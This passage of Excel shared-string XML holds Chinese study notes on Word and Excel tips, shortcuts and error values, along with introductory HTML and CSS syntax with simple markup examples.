    <t>首先打开Word程序，在其菜单栏中执行“视图→工具栏→控件工具箱”命令，这时Word会打开一个“控件工具箱”浮动小窗口，单击该浮动窗口的最后一个“其它控件”按钮，然后在其弹出的列表中选择“Windows Media Player”选项(见图2)，这时在Word中会弹出一个播放器界面，用户在该播放器中单击鼠标右键，选择“属性”选项，在Word随后弹出的“属性”对话框中找到“文件名”选项，然后用户便可以在该选项右侧的空白框中手工输入需要播放视频的绝对路径及文件名，输入完毕后，用户关闭“属性”对话框返回到Word中，如果用户需要马上对指定的视频进行播放，则只要在Word的“控件工具箱”窗口中单击“退出设计模式”按钮即可。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注：在word2007中打开控件工具箱：office图标---word选项---常用---在功能区显示“开发工具”选项卡---旧式工具---其他控件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1．在Word中播放MP3音乐：</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(.mp3)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>3．在Word中播放Flash动画</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(.swf)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入水印：格式-背景---水印；word2007:页面布局---页面背景：水印；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>表格跨页，标题跟着表格走：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 新建你所要求格式的word文档，另在为：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 文件名：normal;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 文件类型：启用宏的word模板；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>c 路径："C:\Users\wwu\AppData\Roaming\Microsoft\Templates"；在XP应该是：C:\Users\wwu\Application Data\Microsoft\Templates</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选中表格；---段落---对齐方式：两端对齐；制表位---制表位位置（如输入3,则表示对齐的最大整数位是6位，超过6位的数字不能按小数位对齐）---对齐方式---小点对齐；前导符：无；（表格内数据不能设置为居中对齐或右对齐(可设置为两端对齐)；）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入---超链接---本文档中的位置：请键入单元格引用；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word:首先要用“书签”确定超链接的位置：插入---链接：书签（名字要以字母开头，不能以数字开头）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>office</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word Excel中的超链接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>office</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>～$文档 是否导入未保存文档？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word中英文混排的技巧</t>
  </si>
  <si>
    <t>word中英文混排的技巧</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>抽取所有英文：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查找---特殊格式（高级）---任意字母---突出显示所有在该范围找到的项目；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中英文分开设置格式：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>取消中英文间距：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>英文大小写问题：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.1 句首字母大写：工具---自动更正---句首字母大写；（word选项---校对---自动更正选项；）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选定文本区域---字体---在“中文字体”和“西文字体”分开设置格式即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选定文本区域---格式---段落---中文版式：去选：中英文之间自动调整间距；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>office每打开一个文档，都会在相同目录下自动生成一个以“～$”开头的同名文件，这是一个自动备份暂存文件（自动备份暂存时间间隔可设置），在文档运行时不可删除，当非正常关机后再重新开机打开Word或Excel文档时，会在左侧出现一个文档恢复的对话框：提示你是否导入未保存的文档，即当打开一个Word或Excel文档时会自动打开一个副本，当编辑文档时，编辑的是副本，软件Word或Excel正常关闭时，副本覆盖原文档，同时自身被删除，当Word或Excel非正常关闭时，副本会保存在硬盘，所以有时会出现：“此文件正被某一用户编辑，只可打开副本；”</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>保存自动恢复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>时间间隔设置：word选项---保存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>保存位置设置：word选项---保存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word制作流程图</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 插入---形状-新建绘图画板（后面的作图就在这里进行）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 双击图形---插入形状（栏）的“编辑文本”工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 绘图工具-格式选项卡---插入形状下拉箭头---流程图---选择图形；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>就爱doc,docx请别来烦我</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word2007的文档格式变成了DOCX，但它目前的兼容性比较差；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 更改默认保存格式：word选项---保存---将文件保存为此格式：word97-2003(.doc);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 更改默认新建格式：HKEY_classes_root---.docx---右击命名为：.doc;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>让输入法随word而动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 word选项---高级：勾选：输入法控制处于活动状态；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2 区域和语言---语言---详细信息---文字服务和输入语言：确保你喜欢的输入法成为默认第一位；</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>？？？</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快捷键操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 word批量删除超链接：ctrl+shift+F9;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2 快速打开“设置单位格式对话框”：ctrl+1;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1.3 字体大小快调：</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ctrl+[ ]</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>ctrl+shift+&lt;&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>；</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.4 定位到最近修改位置：shift+F5;(EXCEL不适用）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.5 快速剪切或复制：选中，按住ctrl+(shift):到目标位置右击；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.6 插入当前日期和时间：alt+shift+D;alt+shift+t;(excel:ctrl+J);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.7 快速輸入剛才輸入的內容：F4；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.8 設置文檔中的上下标的快捷方法：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.9 快速输入中文省略号：ctrl+alt+".";</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速启动word:大块软件快速启动（禁用不必要的插件），如photoshop；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快捷键操作：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 自动重算快捷键：Shift+F9;工具栏---选项---重新计算；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2 快速翻阅工作簿中的工作表：ctrl+pgdn(pgup);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.3 打开“设置单元格格式”对话框：ctrl+1;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速定位到最后一个单元格：在A列上面的地址栏内输入：xfd1048576，回车即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.4 定位到非冻结区域的第一个单元格：ctrl+home;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel 2007默认有16384列，xfd列;1048576行;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>共有单元格个数：1048576*16384：17 17986 9184</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel中显示的错误值：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 #####：单元格所包含数字、日期、时间点位比单元格宽（调整列宽即可）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 #NUM：公式中的数字类型错误，或数字超过excel表示的有效范围；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 #REF：公式引用的单元格被删除或被错误覆盖；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 #VALUE：需要数字或逻辑值时输入了文本；如B1是数字15,B2是文本；则B3中＝B1+B2＝#VALUE;如果B3＝SUM(B1:B2),则＝15（忽略文本）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel带列宽搬家：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>左上单击交叉区域---复制---另一工作表点击A1---粘贴：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>相当于：工作表名称右击---移动和复制工作表；勾选：建立副本；确定；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据透视表</t>
  </si>
  <si>
    <t>有页、行、列、数据四个变量项；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插入（选项卡）---表（栏）---数据透视表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>条件格式：公式＝MOD(Row(),n)=0;格式---图案---颜色；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>隔n行加阴影：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Excel教程</t>
  </si>
  <si>
    <t>数据透视表本质上是从数据库中产生的一个动态汇总报表。数据库可以在一个工作表中(以表格的形式)，也可以在外部数据文件中。数据透视表可以把无穷多的行列数据转换成有意义的数据表示。</t>
  </si>
  <si>
    <t>　　数据透视表也有小小的缺点，与基于公式的汇总报表不同，当用户更改源数据时，数据透视表不会自动更新。这个小缺点并不会带来严重的问题，因为只要单击“刷新”按钮，就能强制数据透视表更新到最新的数据。</t>
  </si>
  <si>
    <t>数据透视表是针对以下用途特别设计的：</t>
  </si>
  <si>
    <t>　　●以多种用户友好方式查询大量数据。</t>
  </si>
  <si>
    <t>　　●对数值数据进行分类汇总和聚合，按分类和子分类对数据进行汇总，创建自定义计算和公式。</t>
  </si>
  <si>
    <t>　　●展开或折叠要关注结果的数据级别，查看感兴趣区域摘要数据的明细。</t>
  </si>
  <si>
    <t>　　●将行移动到列或将列移动到行（或“透视”），以查看源数据的不同汇总。</t>
  </si>
  <si>
    <t>　　●对最有用和最关注的数据子集进行筛选、排序、分组和有条件地设置格式，使您能够关注所需的信息。</t>
  </si>
  <si>
    <t>　　●提供简明、有吸引力并且带有批注的联机报表或打印报表。</t>
  </si>
  <si>
    <t>●要同时禁用多个超链接，执行下列操作：</t>
  </si>
  <si>
    <t>　　1.在空白单元格中，键入数字1，用鼠标右键单击该单元格，然后单击快捷菜单上的“复制”。</t>
  </si>
  <si>
    <t>　　2.然后按下Ctrl并选择要禁用的每个超链接。在“开始”选项卡上的“剪贴板”组中，单击“粘贴”旁边的箭头，然后单击“选择性粘贴”。</t>
  </si>
  <si>
    <t>　　3.在“运算”之下，单击“乘”，然后单击“确定”。</t>
  </si>
  <si>
    <t>在excel2007中要打印所需的准确页数，可以使用“分页预览”视图来快速调整分页符。在此视图中，手动插入的分页符以实线显示。虚线指示 Microsoft Office Excel自动分页的位置。</t>
  </si>
  <si>
    <t>　　在“视图”选项卡的“工作簿视图”组中，单击“分页预览”，然后执行下列操作之一：</t>
  </si>
  <si>
    <t>　　●要移动分页符，请将其拖至新的位置，移动自动分页符会将其变为手动分页符。</t>
  </si>
  <si>
    <t>　　●要插入垂直或水平分页符，请在要插入分页符的位置的下面或右边选中一行或一列，单击鼠标右键，然后单击快捷菜单上的“插入分页符”。</t>
  </si>
  <si>
    <t>　　●要删除手动分页符，请将其拖至分页预览区域之外。</t>
  </si>
  <si>
    <t>　　●要删除所有手动分页符，请右键单击工作表上的任一单元格，然后单击快捷菜单上的“重设所有分页符”。</t>
  </si>
  <si>
    <t>　　最后，若要在完成分页符操作后返回“普通”视图，请在“视图”选项卡的“工作簿视图”组中单击“普通”。</t>
  </si>
  <si>
    <t>HTML文件是被网络浏览器读取，产生网页的文件，从本质上来说，环球网就是一个由HTML文件有一系列传输协议所组成的集合，这些HTML文件存储在分布在世界各地的计算机硬盘上，而传输协议HTTP把这些文件从一台PC传输到另一台PC；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络浏览器能解释HTML文件来显示网页，当你使用浏览器在环球网上浏览网页时，浏览器软件就自动完成HTML文件到网页的转换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML文件与一般文本不同的是，不仅包含文本内容，还包含一些Tab,&lt;&gt;,所以说HTML网页文件就是包含HTML标记和文件内容的ASSCII文档；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML其实是文本，它需要浏览器解释，HTML的编辑器大致可分三种：A 基本编辑软件：记事本或Word存盘为HTML文档；B 半所见即所得，如Hotdog，网页作坊；C 所见即所得：Dreamweaver;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 属性什之间的间隔为空格，也可用西文逗号；（CSS样式用；号），（&lt;和标记文字不能有空格，标记文字和属性名称有空格；）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 属性＝"属性名"；（无双引号也可被容错；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 一些符号必须是半角状态下的英文，如逗号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 标签可嵌套，且可嵌入CSS样式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML文档结构标记</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>&lt;html&gt;,&lt;head&gt;,&lt;body&gt;标记将文档分为头部与正文部分；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 头部标记：对文档进行控制、说明，包含在&lt;head&gt;t &lt;/head&gt;之间，其全部内容都不会在页面上显示；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 正文标签：是网页在浏览器中的显示部分，除框架标记外，所有标记都必须放在&lt;body&gt;…&lt;/body&gt;标记之内；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 &lt;title&gt;标记：搜索引擎搜索的重要条目，不能超过64个字符；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2背景音乐标记：&lt;bgsound src="声音文件" [loop="n"]&gt;;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.3 &lt;meta&gt;标签；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML：let authors mauk up their doument by inserting special instruction,called HTML tags that specify how the document shoud appear,when displayed on a computor screen or when printed.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>the tags includes four groups:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 formatting;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 Link;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 Media;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 Operationa tags;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML文档</t>
  </si>
  <si>
    <t>标记（Markup）:是指在内容的两端各加一个记号，以声明该内容所具有的特性，如"&lt;粗&gt;字体变粗&lt;粗&gt;"；&lt;tag&gt;,&lt;/tag&gt;描述格式；一个tag标签由元素名称和跟在后面的可选属性列表构成，全部包含在&lt;&gt;内，定义&lt;&gt;外的文本或其它网页元素，&lt;&gt;内的内容不会显示有浏览器上，其书写规则有：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML文档</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dreamweaver</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSS样式</t>
  </si>
  <si>
    <t>CSS style and HTML style；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTML：&lt;标记 属性1＝"属性值1" 属性2＝"属性值2" […]&gt;&lt;/标记&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>属性名和值都有所区别，二者的连接、间隔也不一样；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSS语法规则：选择符{属性：值}；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择符可以是一组，用逗号隔开；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自定义的类选择符，名称与HTML标签无关，只需在所定义的HTML标签中的属性的形式写成：class="…",类选择符要在其名字前加一个句点，如：&lt;P class="center" &gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSS样式在HTML中的使用类型：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSS:&lt;标记 style="属性1：属性值1；属性2：属性值2；[…]"&gt;&lt;/标记&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 嵌入式样式表：嵌在HTML标记内；:&lt;标记 style="属性1：属性值1；属性2：属性值2；[…]"&gt;&lt;/标记&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 全局格式样式表（定义有网页头部，层也定义在网页头部）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 定义类：名称以“.类名称”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 定义标签：名称只能是HTML标记名，是对HTML标签的重新定义；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>&lt;head&gt;</t>
  </si>
  <si>
    <t>　　&lt;title&gt;文档标题&lt;/title&gt;</t>
  </si>
  <si>
    <t>　　&lt;link rel=stylesheet href="http://www.dhtmlet.com/dhtmlet.css" type="text/css"&gt;</t>
  </si>
  <si>
    <t>　　&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;html&gt;</t>
  </si>
  <si>
    <t>　　&lt;head&gt;</t>
  </si>
  <si>
    <t>　　&lt;style type="text/css"&gt;</t>
  </si>
  <si>
    <t>　　&lt;!--</t>
  </si>
  <si>
    <t>　　body {font: 10pt "Arial"}</t>
  </si>
  <si>
    <t>　　h1 {font: 15pt/17pt "Arial"; font-weight: bold; color: maroon}</t>
  </si>
  <si>
    <t>　　h2 {font: 13pt/15pt "Arial"; font-weight: bold; color: blue}</t>
  </si>
  <si>
    <t>　　p {font: 10pt/12pt "Arial"; color: black}</t>
  </si>
  <si>
    <t>　　--&gt;</t>
  </si>
  <si>
    <t>　　&lt;/style&gt;</t>
  </si>
  <si>
    <t>　　&lt;body&gt;</t>
  </si>
  <si>
    <t>　　内联定义即是在对象的标记内使用对象的style属性定义适用其的样式表属性。示例如下：</t>
  </si>
  <si>
    <t>　　&lt;p style="color: sienna; margin-left: 20px"&gt;This is a paragraph&lt;/p&gt;</t>
  </si>
  <si>
    <t>几种方式的优先级</t>
  </si>
  <si>
    <t>　　内联样式优先级最高，其次是链接样式，再次是内嵌式，最后是导入样式</t>
  </si>
  <si>
    <t>如何将样式表加入到网页</t>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>与链入外部样式的功能基本相同，只是语法和实现方式上有差别</t>
    </r>
  </si>
  <si>
    <r>
      <t>CSS</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的定义是由三个部分构成</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(selector)</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，属性</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(properties)</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和属性的取值</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(value)</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>语法</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>: selector {property: value} (</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> {</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>值</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">}) </t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">A </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择符是可以是多种形式，一般是你要定义样式的</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTML</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记，例如</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BODY</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>P</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TABLE……</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，你可以通过此方法定义它的属性和值，属性和值要用冒号隔开</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: </t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例子</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:body {color: black}</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，此例的效果是使页面中的文字为黑色。</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">　　B 如果属性的值是多个单词组成，必须在值上加引号，比如字体的名称经常是几个单词的组合: 例子:p {font-family: "sans serif"} (定义段落字体为sans serif) </t>
  </si>
